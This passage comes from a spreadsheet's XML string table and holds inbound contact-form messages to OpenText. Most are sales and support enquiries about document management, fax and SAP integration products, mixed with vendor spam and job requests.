_x000D_
1. Anbindung an SAP, inkl. automatische Indexierung/Nachindexierung der SAP Belege_x000D_
2. Capture inkl. automatischer Klassifizierung _x000D_
3. Akten- und Workflowfunktionalität_x000D_
4. Mobiler Zugriff auf Akten_x000D_
5. Landesspezifische Masken für die europäischen Niederlassungen_x000D_
6. Nutzung der bestehenden Hardware (IBM Power P8, NetApp Filer)_x000D_
_x000D_
In diesem Rahmen würden wir gerne mit Ihrem für unseren Raum (Deutschland/Baden Würtemberg/Mannheim) zuständigen Vertrieb Kontakt aufnehmen._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Frank Plischke</t>
  </si>
  <si>
    <t xml:space="preserve">Wir haben in Alfdorf Schwierigkeiten mit der Archivierung und sollten darüber hinaus eine Report-Modifikation haben._x000D_
Daher suchen wir einen OpenText-Ansprechpartner. </t>
  </si>
  <si>
    <t>email received in order to download presentation done for your exhibit PARIS PRE CATELAN in march 2016. The link I received is not efficient , so I can't access to your presentation and videos. Additional request is it possible to have electronic presentation done by Joel De Rosnay. Thank's for your help. Regards C. SAUGER</t>
  </si>
  <si>
    <t xml:space="preserve">Please consider this mail as important and require your acknowledgement. Currently, we are organizing 2nd International Convention on Geophysics and Geotechnics 2017_x000D_
November 08-09, 2017 Las Vegas, Nevada USA. We sincerely intended to convey our conference Agenda in your Organization. If possible, provide the contact information so that we will send the conference agenda with program details and make further follow up._x000D_
_x000D_
 Note: Geophysics and Geotechnics 2017 is an International congress hosting presentations from more than 30 countries and 100 organizations_x000D_
</t>
  </si>
  <si>
    <t>Requirement of Documetum Software for Document management System . Please provide Name, Address, Email Contact for sending enquiry</t>
  </si>
  <si>
    <t>Jayson verejano information adrs and contact nos.or pls advise him to contact us 09999766750 asap thank you</t>
  </si>
  <si>
    <t>I Can not obtain my license or download brava reader, please get someone in Australia to contact me.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText,_x000D_
_x000D_
This is Jin Wei from BMW NSFC IT Operation team. Nice to meet you!_x000D_
I searched in the internet, and tried to find the best document management company, and I found your company. _x000D_
_x000D_
BMW itself has a document management system already, but maybe we are thinking to replace it in future. _x000D_
So the reason I write the email to you is I would like to know more about your company and especially about your document management product. _x000D_
_x000D_
Could you please tell me if you are interested that we are partners in future?_x000D_
Thanks!_x000D_
</t>
  </si>
  <si>
    <t>OpenText Professional Services Pricing on setup/configure High Availability for Archive Server 10.1.1</t>
  </si>
  <si>
    <t>As part of our digital transformation initiative, Federal Mogul is looking to streamline marketing processes by acquiring a Digital Asset Management / Digital Asset Library solution._x000D_
The scope currently is to optimize gathering, aggregating and delivery of marketing materials (part titles, descriptions, brochures, marketing statements, images, 360, videos, etc.)._x000D_
Please provide a contact person to keep in touch.</t>
  </si>
  <si>
    <t xml:space="preserve">I want to learn more about the e doc set up process for my company sales </t>
  </si>
  <si>
    <t xml:space="preserve">Hi There,_x000D_
Are you interested in reaching EnterpriseDB  Users and partners contacts._x000D_
Please let me know if you have any other database requirement, so that I can get back to you with relevant information._x000D_
Thanks in advance,_x000D_
Laura Lucas._x000D_
</t>
  </si>
  <si>
    <t>Nordstrom is preparing to send out an RFP for digital asset management and we are interested in your company.  I'm reaching out to see if this is an opportunity you would be interested in, and if so, be put in touch with the correct point of contact at your company.  We are anticipating sending out the RFP within the next week or so, so I appreciate your quick response.  I'm frequently away from my desk, so email is probably the best way to reach me.  Thank you in advance.</t>
  </si>
  <si>
    <t>Needing to replace current on-site fax server and looking into the possibilities of RightFax.</t>
  </si>
  <si>
    <t>We are interested in implementing an ECM solution at our law firm (headquartered in Waterloo, Ontario, with offices in Kitchener and Guelph, Ontario as well) and OpenText offering is one that we are interested in looking at. We would like to talk to the appropriate people to discuss its features, pricing, implementation, et c.</t>
  </si>
  <si>
    <t>Hello. I am an Associate at Imperium Law Group.  We require document management software for our law firm with about 20 users.  Could you please provide us with a pricing structure and options for a demo please.  Please contact me via email or phone.  I have also left a voicemail on March 24, 2017.  Thank you for your consideration.  Best Regards, Nav Atwal</t>
  </si>
  <si>
    <t>I need to know who I can speak with about Brava Reader pricing for an OEM opportunity I am working</t>
  </si>
  <si>
    <t>Discuss options and receive a quote.  Please contact only by email until April 3rd.</t>
  </si>
  <si>
    <t>The business operations Manager and Director are interested in using Documentum OpenText for the Part 11 compliant document management system for FDA submission co-editing.  I'd like to set-up a brief 30-minute conversation with the sales reps for my managers.  Please contact me immediately while I have their schedules open for Fri 3/31 and several availabilities next week, w/o 4/3-4/7/17._x000D_
_x000D_
Thank you, _x000D_
Courtney Maney-Askew</t>
  </si>
  <si>
    <t>Hello - I am EMC ECD legacy employee and I am preparing a service proposal to a customer. The proposal should have training and there are two courses on site that should be considered, they are: 3-2020 - OTX Extended ECM for SAP Solutions Foundation_x000D_
and 3-2022 _x000D_
Installation and Administration of OTX Extended ECM for SAP Solutions_x000D_
the courses should be in spanish and on site._x000D_
Please, send me your quotation._x000D_
Regards!</t>
  </si>
  <si>
    <t>interested in a virtual fax option, Please email some costs. thanks!</t>
  </si>
  <si>
    <t>Quote for RightFax_x000D_
would like to assign 100 users fax lines, with 5 shared fax lines.  Please provide quote for service.  approximately 105 faxes sent per day.</t>
  </si>
  <si>
    <t>I use the free Brava Reader.  In the past, you've had an updated version out at least a month before the current version "expires".  The version you have for download is still the version that expires on April 18th.  Do you know when the next one will be released?  Thanks.</t>
  </si>
  <si>
    <t>Document Management Solution</t>
  </si>
  <si>
    <t>Document Management Solution / Pricing / Overview</t>
  </si>
  <si>
    <t>Hello this is Javier, I need a quote for a fax server with 30 ch. I am doing a project with for a bank here in Peru. This project is very big and we are going to implement Cisco. Please send me all the requiments, license , cost, hardware needed, etc.</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
Would you like to acquire an email lead list of Appian BPM users? _x000D_
_x000D_
This list contains a total of 23655 contacts and includes Contact name, Email address, Business Title, Company name, Phone number, Mailing address along with detailed business information. You can also get to customise this list based on specific titles as per your request._x000D_
_x000D_
Titles available : _x000D_
• CIO, CTO_x000D_
• SVP, VP of IT_x000D_
• Director of IT_x000D_
• VP Engineering, Manufacturing, Operations_x000D_
• Director Engineering_x000D_
• Product Management Specialists and other titles_x000D_
_x000D_
Please let me know if there is someone else I may contact regarding our contact database. Alternatively, I would appreciate you passing this along to right person responsible for making such decisions._x000D_
_x000D_
Best Regards,_x000D_
Cynthia Pierson</t>
  </si>
  <si>
    <t xml:space="preserve">Details related to Support and Services Options for BIRT and corresponding costs. </t>
  </si>
  <si>
    <t>Are you able to email over a business information pack about what you offer - we are not yet ready for any kind of meeting we just require information on your software and specifically how it works with SAP and how far you get involved with the integration with SAP. We would appreciate it if you emailed the information pack rather than call or request to discuss further as we are still in discussions with the idea of an invoice scanning solution and it is not certain we will go ahead.</t>
  </si>
  <si>
    <t>Need to load faxpress on desktop computer</t>
  </si>
  <si>
    <t>Exam registration - I don't know where to book the venue and time._x000D_
I don't see the option to</t>
  </si>
  <si>
    <t xml:space="preserve">Could you share a demo site with me please so i can have a go with the digital asset management side of things. </t>
  </si>
  <si>
    <t>I would like to find out information about training courses offerings and certification for consultants</t>
  </si>
  <si>
    <t xml:space="preserve">Assistance request with size descriptions for bedskirts and decorative pillows. </t>
  </si>
  <si>
    <t xml:space="preserve">Please could you provide me with more sales information </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I'm looking for a Data Archieve software solution that can:_x000D_
_x000D_
-Store Millions of documents (mainly PDFs)_x000D_
-Cater for 25-50TB of data storage_x000D_
-Indexies_x000D_
-Encrypts _x000D_
-Is Resiliant_x000D_
-Fast retreival of individual docs on demand._x000D_
_x000D_
The solution will be local based (i.e not on cloud or SaaS)_x000D_
_x000D_
Will Opentexts 'Content Management' be able to cater for all the above?</t>
  </si>
  <si>
    <t>QinetiQ provides science and technology advice to customers including UK Government departments and the Ministry of Defence. We provide systems integration advice and expertise and would appreciate a trial of OpenText Content Server 10.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Is there a certification course for Capital Projects, and how/where can we get more information with regards to that?_x000D_
_x000D_
Kind Regards,_x000D_
Aleksandar Marinkovic</t>
  </si>
  <si>
    <t>We are trying to implement IBM tool based DevOps for Metastorm BPMS as well, not seeing any API available to automate build/package and Deployment application automatically._x000D_
_x000D_
Please  reach out me with your recommendation.  We are very particular about bringing BPMS under our continuous delivery pipeline._x000D_
_x000D_
Thanks_x000D_
Sathish</t>
  </si>
  <si>
    <t>We are comparing document generation solutions for a customer and I need some help on CCE/CC CRM functionality and pricing</t>
  </si>
  <si>
    <t>Hi,_x000D_
Our company being an SAP partner have recently implemented successfully SAP OT VIM/Xecm in one of our big clients locally in partnership with an external partner._x000D_
_x000D_
We are currently with other clients too for a green field implementation for SAP OT VIM/Xecm and EFM modules, the reason for contacting you is to inquire about the training to our consultants for the above mentioned SAP OT modules._x000D_
_x000D_
Appreciate if could let us know how you can help us in achieving the same by letting us know the best training available, the cost and duration of the course with which we are able to cope with the market requirement._x000D_
_x000D_
Regards_x000D_
Syed Yasir</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
nous revoyons completement notre architecture applicative et serions interressés de mieux connaitre votre offre._x000D_
Cordialement,_x000D_
Christophe Gerault</t>
  </si>
  <si>
    <t xml:space="preserve"> Hello and good morning_x000D_
 _x000D_
I am Mike Alias Sanjeev, Marketing Manager with a reputable online marketing company based in India._x000D_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than anyone else and we can prove it. We do not use "link farms" or "black hat" methods that Google and the other search engines frown upon and can use to de-list or ban your site. The techniques are proprietary, involving some valuable closely held trade secrets. Our prices are less than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company’s website address (mandatory) and or phone number._x000D_
_x000D_
So let me know if you would like me to mail you more details or schedule a call. We'll be pleased to serve you._x000D_
I look forward to your mail._x000D_
_x000D_
Thanks and Regards_x000D_
Mike Alias Sanjeev_x000D_
</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I am a SAP employee and would need access to OpenText documents._x000D_
_x000D_
Thank you!_x000D_
Regards Chuanjiang</t>
  </si>
  <si>
    <t>For our customer ABM International we would like to receive a new License file, this because they would like to use XML-in and Storyteller, which is not available in the current license file._x000D_
_x000D_
Please advise how to do this._x000D_
_x000D_
Kind regards, Michael Fischer</t>
  </si>
  <si>
    <t>Hello Dear Sir/Madam_x000D_
_x000D_
wish you a nice day!_x000D_
This is Sue from china tarpaulin&amp; canvas manufacturer._x000D_
we have been manufacturing truck cover tarp etc for over 23years._x000D_
_x000D_
May I ask if you have any requirement for the cover tarp?_x000D_
please kindly confirm your detailed requirements,such as size,quantity,color,logo(if need),etc,I will do exact factory price for you soon._x000D_
we also have stock sample for quality check._x000D_
looking forward to your reply soon._x000D_
_x000D_
regards,_x000D_
Sue</t>
  </si>
  <si>
    <t>May you please help me with the email address of your senior HR, many thanks</t>
  </si>
  <si>
    <t>I need help with stored procedures and PHP.</t>
  </si>
  <si>
    <t>need help regarding authenticating REST client and uploading my created reports in ihub. facing issues while evaluating the product</t>
  </si>
  <si>
    <t>I am requested access to partner info and SW as I was just hired by Alitek consulting as a permanent project manager.</t>
  </si>
  <si>
    <t>Looking for a Quality Management solution. Call recording/monitoring. Also looking for tools to manage workforce (long-term). Please reach out ASAP. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Would you be interested in having us help sell your service for you? _x000D_
 _x000D_
Basically we create animated videos that are designed to promote your service and increase your websites conversion rate (with some clients reporting a 40% increase in online sales)_x000D_
_x000D_
If you're interested, we would happily build you a 30 second explainer video for your service for just $297. (including script/voiceover)_x000D_
_x000D_
I’m confident we can make a killer video for you.. _x000D_
_x000D_
I look forward to your reply, or you can see some examples here :) _x000D_
www.click-campaigns.com/sale_x000D_
_x000D_
Matt_x000D_
</t>
  </si>
  <si>
    <t>After costing for OpenText Document Management System eDOCS</t>
  </si>
  <si>
    <t xml:space="preserve">Currently, we have a customized application build on the top of Documentum by using WebTop. The application it self is belong to TOTAL SA, since the cooperation Contract between Indonesian Government and TOTAL SA will end on the end of 2017, this application will not be available anymore for the new operator who will continue the operation, but the new operator still have the documentum as the back end. We require to build the similar application with the same infrastructure and functionalities that will be used by the new operator. could it be done? do you have the resources to build it?  </t>
  </si>
  <si>
    <t>I'am sending you this proposal with reference from Oracle._x000D_
 _x000D_
We would like to fix a call with your sales team regarding a Project in Oman (Project Information Management System)  with one of our client. Please give me a call to the below number +91 9809914166.</t>
  </si>
  <si>
    <t>Interested in possibilities for integrated BPM and workflow platform interfaced with SAP ECC</t>
  </si>
  <si>
    <t>Hi - Hope you are having a nice day!_x000D_
_x000D_
I’m Jason and I work for a company that sells high-quality IT parts and supplies to refurbishers, manufacturers and retailers in small and large quantities. I was looking at our database and I don’t think you’ve ever purchased from us so I wanted to personally reach out to you and see if you have any specific needs at this time. Here are a few of the types of things that we have:_x000D_
_x000D_
Memory_x000D_
Processors (Intel &amp; AMD)_x000D_
Video Cards (Basic &amp; Gaming)_x000D_
Hard Drives (Laptops, Desktops &amp; Servers)_x000D_
SSD Drives (Laptops &amp; Desktops)_x000D_
Power Supplies (Desktop &amp; Server)_x000D_
Laptop replacement parts_x000D_
PC Replacement parts_x000D_
Network Switches_x000D_
Cables (VGA, DVA, HDMI, Ethernet, Power, etc.)_x000D_
Keyboards &amp; Mice (Wired &amp; Wireless)_x000D_
Computer Accessories (Speakers, etc.)_x000D_
Fully Refurbished Laptops_x000D_
Fully Refurbished PCs_x000D_
LCD Monitors_x000D_
Cell Phone Parts_x000D_
Apple, Dell, HP, Lenovo, Samsung, Toshiba, Sony, LG and More!_x000D_
_x000D_
To give you an idea, I just had someone order a box of 25 Power Cables from me for $3 each. Another client needed some memory to upgrade some older PCs and we supplied them with a bunch of 2GB and 4GB sticks of RAM. No order is too small or too large so tell me what you need and I’ll help you out._x000D_
_x000D_
Thank you,_x000D_
_x000D_
_x000D_
-- _x000D_
Jason Michaels                         _x000D_
Sales Representative_x000D_
reusetekmarketing@gmail.com_x000D_
+1 855-305-7897_x000D_
ReUseTek Electronics_x000D_
reusetek.com_x000D_
15561 Del Amo Ave, Tustin, CA, 92780</t>
  </si>
  <si>
    <t>JOBS IN OPENTEXT.PLEASE REFER AND MAIL ME</t>
  </si>
  <si>
    <t>Access licensing keys and support</t>
  </si>
  <si>
    <t>Looking for contract lifecycle management software solutions</t>
  </si>
  <si>
    <t>Documentum Info</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Can you please advise about the supportability for OpenText Brava for SharePoint 2016?_x000D_
_x000D_
Additionally in can my web application had Form Based Authentication, will there be any limitations?_x000D_
_x000D_
Finally; please advise about the licensing model for the OpenText Brava for SharePoint? Is it based on users?_x000D_
_x000D_
Looking forward your feedback,_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>aaafafawqwwasd</t>
  </si>
  <si>
    <t>need assistance blocking fax number from sending faxes to me.</t>
  </si>
  <si>
    <t>Best Buy IT is looking for a vendor partner to help upgrade our Distribution Management system from Oracle forms (6i) to Java.  We are looking to move quickly as we have tight deadlines, and would like to find a vendor who has the capabilities and resources to meet our needs.</t>
  </si>
  <si>
    <t>Vi use TD 6.3 Build  4658 and we are on the point of having a company run a Proto Type for one year.  Still we need to check tings in the New Forum.  We also will discuss to go to 7.0, but we feel an agreement as for the mentioned proto typ should come first.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to talk to someone about upgrading to a cloud based version. </t>
  </si>
  <si>
    <t xml:space="preserve">A new contact at our existing customer PSE is trying to get access to the KC.  Her email is:  Amandeep.Sohal@pse.com.  Can someone please contact her to make sure she has appropriate access to product content?_x000D_
_x000D_
Thanks,_x000D_
Jean </t>
  </si>
  <si>
    <t>Unanswered questions, inability to use the [extremely frustrating] "help" function, I need help to figure out some simple tasks related to first class e-mail.</t>
  </si>
  <si>
    <t>Looking for the Human resources contact information for the Chicago IL office.</t>
  </si>
  <si>
    <t>We had to replace an old PC that had Redact-It Desktop software installed and re-install it on a new PC. The re-installation appeared to go smoothly, but now the user reports an error that states "The MAC address in the license does not match the MAC address on the computer". Please provide any guidance on how to resolve this issue. _x000D_
Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to track down an old copy of SQLWindows to compile an application with files containing "Outline Version - 4.0.27" I believe it would be Team developer 1.5. Is there any way to perchance a copy?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Richard Chase </t>
  </si>
  <si>
    <t>Major MAJOR Complaints! We use your company as our EDI Interface, and your service has been severely lacking in the last few months, and your Support team has been extremely unresponsive. I have asked numerous times to talk to a supervisor and I am not getting any useful response. Can someone please contact me so we can resolve our issues with your company? FYI, I have also initiated a complaint with the Better Business Bureau</t>
  </si>
  <si>
    <t>I am looking for 3 items.  Let me give you some background.  We are the 'functional' support for ENMAX.   I notice you have an administration guide.  But I was hoping you had something more like a 'training guide' for the following modules for functional support:_x000D_
	RM 10.5.1  _x000D_
	Classifications 10.5.1 _x000D_
	Physical Objects 10.5.1 _x000D_
_x000D_
When we installed the RM for 9.7, we got a  Fundamental Knowledge (Training Manual), that we could refer back to to understand the fundamentals of the module, hoping you have something along those lines for the 3 modules above._x000D_
I searched your knowledge base but it was more admin type info I was receiving._x000D_
Please advise _x000D_
Lorraine</t>
  </si>
  <si>
    <t>need to find out if Brava redaction software is CJIS or FIPS140-2 security compliant, or if you offer a version that is.  Please respond via email if possible</t>
  </si>
  <si>
    <t>Looking at including eRoom in evaluation process for new IMS/EDMS System for our company._x000D_
We would like a trial to access it suitability as our new system._x000D_
Please arrange as soon as possible for someone to contact me on my email to discuss._x000D_
Thanks and regards_x000D_
_x000D_
Ruth Gilpin</t>
  </si>
  <si>
    <t xml:space="preserve">Requesting an email address to which a Request for Proposal could be sent. </t>
  </si>
  <si>
    <t>Curious of any training materials or classes you have for Exstream Manager and Designer.  We will be adding to our group and in addition to our internal training we may require additional training.  _x000D_
_x000D_
More interested in the train on your own following a tutorial on your own with resources but also open to on-site classes._x000D_
_x000D_
Again just interested in hearing what you have.  Thank you for your time.</t>
  </si>
  <si>
    <t>You sent me the email with what should be a link to open the Brava Reader.  However, I am unable to download it, open it or do anything with it.  Please advise.</t>
  </si>
  <si>
    <t>Dear Manager,_x000D_
 _x000D_
Thank you for your time._x000D_
This is Becky from E-energy Ltd._x000D_
Hope to find a way to cooperate with you._x000D_
 _x000D_
We deal Intel xeon server processors for 14 years._x000D_
_x000D_
The most competitive price and sufficient after-sales service can be offered._x000D_
_x000D_
Now we are the leader of this field in our local market._x000D_
Price lists will be sent if needed._x000D_
 _x000D_
Would you be interested in receiving our offers?_x000D_
_x000D_
Many thanks!_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
Best Regards_x000D_
Becky Lee_x000D_
_x000D_
_x000D_
B2-0551 7/F Kin on Comm Building,_x000D_
49-51 Jervois St, Sheung Wan, Hongkong._x000D_
Http://servercpu.en.alibaba.com_x000D_
www.energycpu.com.hk_x000D_
Tel:86-020-3726 8151_x000D_
Mob/whatsapp:86-188 2079 8619_x000D_
Email:becky@energycpu.com_x000D_
Skype: XEONCPU5</t>
  </si>
  <si>
    <t>We have RightFax 9.4.1.2074 and urgently need to upgrade to latest version in order to get this to work together with MS Exchange 2016. Where can we buy an upgrade? Your Norwegian reseller does not exist anymore.</t>
  </si>
  <si>
    <t>Please call me after 9 a.m. EST. Thank you.</t>
  </si>
  <si>
    <t>------------------------------【アパレル系Webデザイナー。フリーランスの実績もある若手クリエイター】　　_x000D_
_x000D_
_x000D_
度々のご連絡にて、大変失礼いたします。 _x000D_
株式会社キャリアシステムと申します。_x000D_
_x000D_
貴社ホームページを拝見し、『主婦』×『即戦力』の_x000D_
ご提案をさせていただきたくメールいたしました。_x000D_
_x000D_
弊社は「キャリア主婦」の活用をメインに時短派遣を_x000D_
させていただいている会社です。 求められるポジションや_x000D_
経験に見合った主婦の方を人材派遣でご紹介しております。_x000D_
◆弊社HP　『派遣deパート』_x000D_
https://www.parthaken.jp/_x000D_
_x000D_
_x000D_
この度は_x000D_
 ╋━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
アパレル系Webデザイナー。フリーランスの実績もある若手クリエイター_x000D_
 ╋━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
のご紹介できればと思い_x000D_
プロフィールをご参考までに添付させていただきます。_x000D_
ご一読・ご検討いただき、御社のお力になれましたら幸いです。_x000D_
_x000D_
_x000D_
◆アピールポイント◆_x000D_
大手アパレル企業にて、広告宣伝を学んだ後、EC運営代行事業に_x000D_
携わっていたため、ファッション系デザインを得意としています。_x000D_
20代の若い感性のある女性Webデザイナーです。_x000D_
性格も明るく、周りに気配りができるタイプです。_x000D_
現在、キャリアシステムで就業中ですが3/末で契約満了予定のため_x000D_
4/1より就業可能です。_x000D_
_x000D_
_x000D_
◆スキル情報◆_x000D_
・CMSサイトの更新経験あり_x000D_
・「Illustrator」や「Photoshop」を制作し、WEBサイト更新業務経験あり_x000D_
・「Illustrator」や「Photoshop」を制作し、WEBサイト新規作成経験あり_x000D_
・レスポンシブデザイン（コーディング）ができる_x000D_
・ユーザビリティやアクセシビリティの配慮ができる_x000D_
・CSS、JavaScriptを 使用してWEBサイトコーディング経験あり_x000D_
・主にPHPを使用したCMSサイトコーディング経験あり_x000D_
・手書きでHTMLコードが書ける_x000D_
・SEO対策_x000D_
・見出し、引用、リンクといった文書構造_x000D_
・JavaScript（JQuery）など動きのあるサイトを作れる_x000D_
・Webライティング（ブログ・メルマガ）の経験がある_x000D_
・HPの更新業務経験がある_x000D_
・写真のレタッチ（切り抜きや色の調整）、編集した画像をWeb用に書き出しできる_x000D_
・レイヤーを使った画像処理や画像のスライスができる_x000D_
・ガイド・グリッドの設定変更ができ、編集した画像をWeb用に書き出しできる_x000D_
・ベジェ曲線の描画、トレースができ、マスク・シェイプの作成ができる_x000D_
・デザインビュー/コードビューがわかる_x000D_
_x000D_
_x000D_
◆希望・条件等_x000D_
月～木　週3～4日　9：00～18：00の中で7時間以上勤務希望。_x000D_
【月額請求単価】218,400円　+　交通費実費請求_x000D_
詳細：2600円/時間　×　7時間　×　週3日_x000D_
_x000D_
_x000D_
他にも『Ｗｅｂデザイナー、ディレクター』などのＷｅｂ系人材。_x000D_
『SE・PG』などのエンジニア、『営業事務』などの事務系職種など_x000D_
キャリア主婦に毎月150人登録頂いております。_x000D_
お困りの職種についてお気軽にご相談ください。_x000D_
よろしくお願いします。_x000D_
_x000D_
_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
株式会社キャリアシステム 東京_x000D_
担当：浅井・佐藤_x000D_
cs-tokyo@919.jp_x000D_
フリーコール：0120-505-169_x000D_
_x000D_
〒107-0052　東京都港区赤坂2-11-7　ATT新館_x000D_
TEL：03-5574-7333_x000D_
「派遣deパート」：https://www.parthaken.jp/_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
_x000D_
＊お手数ですが、配信停止をご希望される方は_x000D_
・社名_x000D_
・メールアドレス_x000D_
を記載いただき【配信停止】と記載いただき_x000D_
下記アドレスまでご返信いただけますでしょうか_x000D_
_x000D_
cs-tokyo@919.jp_x000D_
_x000D_
以後、配信しないよういたします。</t>
  </si>
  <si>
    <t>info bout it</t>
  </si>
  <si>
    <t>Product Evaluation. We are evaluating Opentext MDM for one of our customers and wanted to understand the tool capabilities.</t>
  </si>
  <si>
    <t>Im interested in purchasing open text for our estimator</t>
  </si>
  <si>
    <t>Inquiry regarding availability of a Section 508 Voluntary Product Accessibility Template (VPAT) for Redact-IT</t>
  </si>
  <si>
    <t>I would like to discuss support options for our instance of Content Server with the OpenText area manager for Brisbane, Australia. I would like to talk with an OpenText employee and not a partner at this stage</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested in a fax over ip solution that integrates with Cisco to provide fax to email as well as support for multifunction printers.  Please contact me to add you to my vendor selection._x000D_
_x000D_
Thank you.  _x000D_
_x000D_
Allen </t>
  </si>
  <si>
    <t>I am interested in an ECM system for Dole's account receivables department.</t>
  </si>
  <si>
    <t xml:space="preserve">Support:_x000D_
Re:  Imaging for Windows Ver. 4.0 _x000D_
(Order Number: 13876956222)_x000D_
_x000D_
One of our users is getting mysterious errors opening some TIFF files. She can open some files but not others_x000D_
Is there some sort of hidden configuration file that might cause this error?_x000D_
Other  users don’t get the same error._x000D_
_x000D_
It is  “ an internal error has occurred”._x000D_
 _x000D_
_x000D_
Thanks in advance for any help you can offer,_x000D_
_x000D_
Bob_x000D_
</t>
  </si>
  <si>
    <t>We currently use eDOCS DM5 with Office 2010 in a Windows 7 Pro environment. We are upgrading from Office 2010 to Office 2016 and 365. What issues will we have??</t>
  </si>
  <si>
    <t>We are long time user of the Gauss document management system.  We are discussing obtaining a workflow system so we can better manage key processes.  Can you provide me details on the workflow systems you offer?  Also are the workflow system compatible with the Gauss solution we use?</t>
  </si>
  <si>
    <t>Hello! I am working on a project for a client, who has a large intranet site running on RedDot 10. I understand that RedDot is now OpenText. What is the current version? Is there an upgrade path from RedDot 10 to whatever is current? They are concerned that their platform will no longer have support in the future, and are considering implementing something else. I'm looking to evaluate how OpenText products might be a good choice for them.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm interested in getting more information and a price quote for implementing OpenText Document Management for a Canadian non-profit client. </t>
  </si>
  <si>
    <t>I'd like to speak with a sales representative regarding eDocs.  I can be found on (281) 906-1549 if unavailable on my office line.</t>
  </si>
  <si>
    <t>Request for more info about DAM</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I understand that you are one of the Exhibitors in the “SAPPHIRE NOW and ASUG Annual Conference-_x000D_
May 16–18, 2017, Orlando, Florida._x000D_
I was wondering if you would be interested in acquiring this SAPPHIRE NOW -ASUG Annual Conference -2017 Attendees List for Booth Invites, Appointment Setting, and Networking and for your Marketing initiative. We have an extensive list with verified Professional Email address and Phone numbers for your review._x000D_
_x000D_
Why Exhibit?_x000D_
SAPPHIRE NOW and ASUG Annual Conference offers an outstanding opportunity to meet and interact with SAP customers, SAP partners, and ASUG members from around the globe._x000D_
_x000D_
Where else do you have the ability to consult face-to-face with thousands of senior executives, lines of business and IT decision makers, business managers, and hands-on IT professionals, all looking for solutions to their key business challenges?_x000D_
_x000D_
Data Fields: First Name, Last Name, Email Address, Phone Number, Fax, Company Name, Website Address, Job Title, Physical Address, Revenue Size, Employee Size._x000D_
_x000D_
If you are interested, drop me a line. We will get back to you with pricing, counts and other information for your review._x000D_
_x000D_
Thank you and I look forward to hearing from you._x000D_
_x000D_
Regards,_x000D_
_x000D_
Samuel Kimberly_x000D_
Marketing- Demand Generation Coordinator_x000D_
Ph: 415-226-1490_x000D_
_x000D_
Eventdatalist If you don't wish to receive emails from us reply back with “Leave Out”._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I have an Oil and Gas customer that has contracted with Atos to evaluate ECM capabilities and help them select an optimal product/solution set.  I need someone from OpenText to contact me for a discovery session, ASAP, as this project has a very short turnaround.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I need to quote (the cost) 45 licenses of Open Text Business Intelligence 10.1.2_x000D_
_x000D_
Regards_x000D_
_x000D_
Orlando</t>
  </si>
  <si>
    <t>We at VR Cyber Security seamlessly deliver applications that offer data Identification, data Classification, data loss prevention, rights management and encryption of mobile devices. Hence we eliminate the vulnerability and significantly reduce the risk of losing your valuable_x000D_
data. We appreciate your business and look forward to providing you with quality products.</t>
  </si>
  <si>
    <t>We are currently running a Windows Server 2003 with RightFax version 9.4.1.3088. We want to set up a new windows server with version 2012 R2. From your website, I understand we need RightFax version 10.6 with Feature Pack 1 to run Windows Server 2012 R2. _x000D_
Could you please tell me how that changes our license (if it does) and if there is any change in cost and where I can download the software?_x000D_
_x000D_
Thank you,_x000D_
Daniela Relaford</t>
  </si>
  <si>
    <t>I am currently working on a design for a Right Fax solution and would like some technical design assistance, could you please supply contact details._x000D_
_x000D_
Thanks_x000D_
Dave</t>
  </si>
  <si>
    <t>currently running Right fax on allscripts ED but would like to expand into our two other electronic health records systems. Would like to ask questions regarding this. Thank You</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am a student of master degree at the National Polythecnic Institute in Mexico City, México. Currently, i am in an academic stay in this term (Until June) at the University of Waterloo._x000D_
My thesis work is about Prediagnosis of breast cancer using metaheuristics, and i have presented two papers for congresses._x000D_
_x000D_
I am interested in working with you in a full-time job, i have knowledge of some programming languages but i am interested in learning more._x000D_
_x000D_
I have been working as programmer of general software applications and web backend for 2 years. Also my bachelor's degree and master's degree are related to computing and programmation._x000D_
I would be available for a full-time job in August (After i finish my Master's degree) and i am really interested to join your team._x000D_
_x000D_
My CV can be seen here: https://drive.google.com/open?id=0B7PHTNkHs60BMHZyZmdpZEs5ajg_x000D_
_x000D_
Best regards,_x000D_
David</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I was curious about the cost of your product.  We would be looking for a non-imbedded server solution to tie in a practice management system, a health record system, quick books, and various other data sorces such as data files or an access database.  Please quote for 10 users._x000D_
_x000D_
Thanks,_x000D_
_x000D_
John _x000D_
</t>
  </si>
  <si>
    <t>Tried to download iHub trial, however there is a hidden fields which asks for the user to provide the industry they work in, I can't download the demo because this field does not show up until you hit submit. In which it errors out  because it is a required field. Browser is Chorme.</t>
  </si>
  <si>
    <t>Will the presentations (ppt) be made available to the attendees?</t>
  </si>
  <si>
    <t>I desire know the cycle of live of EMC xPression product. Also I need know the partners in Mexico with experience in this product for review the distribution architecture and capacity assessment. Who can help us for questions.</t>
  </si>
  <si>
    <t>I'm looking for ECM solutions that can assist with our ETL processes.</t>
  </si>
  <si>
